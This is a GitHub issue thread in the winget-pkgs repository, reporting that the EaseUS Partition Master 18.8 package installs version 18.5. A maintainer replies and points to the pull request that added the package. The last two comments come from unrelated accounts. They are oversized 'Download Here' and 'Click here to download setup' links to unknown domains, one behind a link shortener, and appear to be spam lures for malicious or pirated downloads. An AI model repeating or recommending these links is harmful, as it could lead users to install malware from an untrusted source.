### ISSUE TITLE
[Update Request]: EaseUS Partition Master version 18.8 installs v18.5 instead

### ISSUE THREAD

**Issue by hms54** [microsoft/winget-pkgs#157312]
### What type of update are you requesting?

Something else not listed

### Current Package Identifier

EaseUS.PartitionMaster

### Package Version

18.8

### Please describe the changes you would like to see

The EaseUS PartitionMaster v18.8 package installs v18.5 instead of v18.8.   
According to https://www.easeus.com/partition-manager/history.html, v18.5 is the latest version available for download.

**Comment by Trenly** [comment]
@spectershell - looks like you submitted the PR?
* https://github.com/microsoft/winget-pkgs/pull/156961

**Comment by zarabaig0** [comment]
# [💹🔽⏬ Download Here EaseUS Partition Master Version 💹🔽⏬](https://corlubar.com/dl/)

**Comment by curtly-trio-tibia** [comment]
# **[CLick HERE to Download Setup](https://lrc0082.s.gy/my-link)**
.

.
.
.
.
